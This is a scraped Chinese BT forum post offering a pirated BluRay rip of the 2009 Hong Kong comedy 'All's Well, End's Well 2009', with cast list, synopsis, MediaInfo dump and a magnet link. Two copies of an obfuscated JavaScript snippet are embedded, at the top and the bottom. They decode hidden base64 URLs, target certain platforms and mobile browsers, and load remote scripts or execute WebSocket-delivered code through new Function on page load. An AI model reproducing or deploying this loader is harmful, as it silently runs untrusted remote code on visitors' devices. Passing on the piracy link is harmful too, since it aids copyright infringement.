家有喜事2009[国粤语配音/中文字幕].All's.Well.End's.Well.2009.1080p.BluRay.x265.10bit.DTS.2Audio 7.07GB

版主小s 1月前 186

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 家有喜事2009 / All's Well, End's Well 2009 / 家有囍事2009

◎年 代 2009

◎产 地 中国香港

◎类 别 喜剧

◎语 言 粤语 / 汉语普通话

◎上映日期 2009-01-22(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt1305854/

◎豆瓣评分 5.4/10 (52014人评价)

◎豆瓣链接 https://movie.douban.com/subject/3244162/

◎片 长 100分钟

◎导 演 谷德昭 Vincent Kok (id:1025526)

◎编 剧 谷德昭 Vincent Kok (id:1025526)

黄百鸣 Raymond Wong (id:1275277)

◎演 员 古天乐 Louis Koo (id:1027577)

吴君如 Sandra Ng (id:1127819)

黄百鸣 Raymond Wong (id:1275277)

郑中基 Ronald Cheng (id:1032940)

姚晨 Chen Yao (id:1029395)

郭涛 Tao Guo (id:1274274)

沈丽君 Lijun Shen (id:1314414)

梁雨恩 Cathy Leung Yue-Yan (id:1335886)

郑文辉 Man-Fai Cheng (id:1346322)

李尚正 Sheung-ching Lee (id:1326286)

维韦克·马布巴尼 Vivek Mahbubani (id:1333959)

夏春秋 Chun Chau Ha (id:1335979)

黎美言 Winkie Lai (id:1335980)

陈子聪 Conroy Chan (id:1275156)

陈宝骏 Po-Chun Chan (id:1426242)

李凯贤 Brian Lee (id:1374560)

郑丽莎 Lisa Cheng (id:1359537)

严嘉仪 Yim Ka Yee (id:1405545)

张纹嘉 Crystal Cheung (id:1348763)

潘杰宁 Kelena Poon (id:1378626)

明德丰 Sherwin Ming (id:1459924)

陈淑兰 Sheila Chan (id:1314841)

郑希怡 Hei-Yi Cheng (id:1221295)

麦兆辉 Alan Mak (id:1126158)

雷颂德 Mark Lui (id:1052286)

傅颖 Theresa Fu (id:1051442)

张致恒 Steven Cheung (id:1042888)

蔡卓妍 Charlene Choi (id:1041425)

卢惠光 Ken Lo (id:1032633)

谷德昭 Vincent Kok (id:1025526)

甄子丹 Donnie Yen (id:1025194)

陈国坤 Kwok-Kwan Chan (id:1229775)

黄真真 Chun-Chun Wong (id:1274280)

陈凯师 Kai-Shi Chen (id:1319710)

林子聪 Tze Chung Lam (id:1314402)

邵音音 Yin-Yin Shaw (id:1297367)

高志森 Clifton Ko (id:1281025)

张达明 Tat-Ming Cheung (id:1274433)

李香琴 Heung Kam Lee (id:1275009)

卢靖姗 Celina Jade (id:1018743)

孙鹏 Peng Sun (id:1324807)

王长田 Changtian Wang (id:1356370)

张昭 Zhao Zhang (id:1397618)

黄英华 Ying-Wah Wong (id:1301204)

张文宝 Man Po Cheung (id:1280622)

邝志良 Chi-Leung Kwong (id:1289164)

余家安 Bruce Yu (id:1301555)

曾伯铨 Steven Tsang (id:1310849)

陈宝骏 Po-Chun Chan (id:1426242)

杨德毅 Jacky Yeung (id:1164248)

郑丽莎 Lisa Cheng (id:1359537)

严嘉仪 Yim Ka Yee (id:1405545)

◎标 签 喜剧 / 香港 / 2009 / 爱情 / 搞笑 / 贺岁 / 中国 / 家有喜事

◎简 介

余宝(郑中基 饰)的家姐余珠(吴君如 饰)性格强势,事业成功,著有多部宣传单身主义的畅销书。余珠的未嫁令弟弟颇为困扰,因为很据极为灵验的家训,余宝无法在姐姐成婚前确定自己的终身大事。经体会到爱情“天旋地转”之感的公司阿姨介绍,余宝请动爱情治疗师曹迪克(古天乐 饰)出面,帮助姐姐打开封闭的心锁。曹迪克成功接近余珠,并使其陷入了旋转的恋爱感觉。然而在曹迪克和余宝的一次千岛湖之行中,两人结识了豪放热情的龅牙珍(姚晨 饰)和温柔可爱的小敏(沈丽君 饰),并双双沉入爱河。与此同时,纠结难耐的余珠前往杭州探视曹迪克,在私家侦探柯男(黄百鸣 饰)的陪同下发现了事情的真相。不过幸运的是,每个人最终都找到了自己爱情的归宿……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 251084690286842770792702628049974731040 (0xBCE5270111ADD756146F8469D4982120)

  4. Complete name : All's.Well.End'[email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.07 GiB

  8. Duration : 1 h 39 min

  9. Overall bit rate : 10.2 Mb/s

  10. Encoded date : UTC 2021-10-30 06:26:56

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 39 min

  20. Bit rate : 7 968 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.160

  30. Stream size : 5.53 GiB (78%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=20.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 39 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossy

  50. Stream size : 1.05 GiB (15%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4354 (0x1102)

  59. Format : AC-3

  60. Format/Info : Audio Coding 3

  61. Commercial name : Dolby Digital

  62. Codec ID : A_AC3

  63. Duration : 1 h 39 min

  64. Bit rate mode : Constant

  65. Bit rate : 640 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : L R C LFE Ls Rs

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 31.250 FPS (1536 SPF)

  70. Compression mode : Lossy

  71. Stream size : 455 MiB (6%)

  72. Title : Mandarin

  73. Language : Chinese

  74. Service kind : Complete Main

  75. Default : No

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #1

  79. ID : 4

  80. ID in the original source medium : 4609 (0x1201)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 34 min

  86. Bit rate : 43.5 kb/s

  87. Count of elements : 3570

  88. Stream size : 29.5 MiB (0%)

  89. Title : chs

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #2

  95. ID : 5

  96. ID in the original source medium : 4608 (0x1200)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 34 min

  102. Bit rate : 49.5 kb/s

  103. Count of elements : 3570

  104. Stream size : 33.6 MiB (0%)

  105. Title : cht

  106. Language : Chinese

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #3

  111. ID : 6

  112. ID in the original source medium : 4610 (0x1202)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 34 min

  118. Bit rate : 41.9 kb/s

  119. Count of elements : 3580

  120. Stream size : 28.5 MiB (0%)

  121. Title : eng

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : 第 01 章

  128. 00:07:18.000 : 第 02 章

  129. 00:14:11.000 : 第 03 章

  130. 00:24:41.500 : 第 04 章

  131. 00:32:46.500 : 第 05 章

  132. 00:40:11.000 : 第 06 章

  133. 00:49:39.500 : 第 07 章

  134. 01:01:47.500 : 第 08 章

  135. 01:06:24.500 : 第 09 章

  136. 01:14:59.000 : 第 10 章

  137. 01:18:17.500 : 第 11 章

  138. 01:28:15.500 : 第 12 章




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:0EE458C2F756F072CB6F11AB4785ED199FEE6743

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};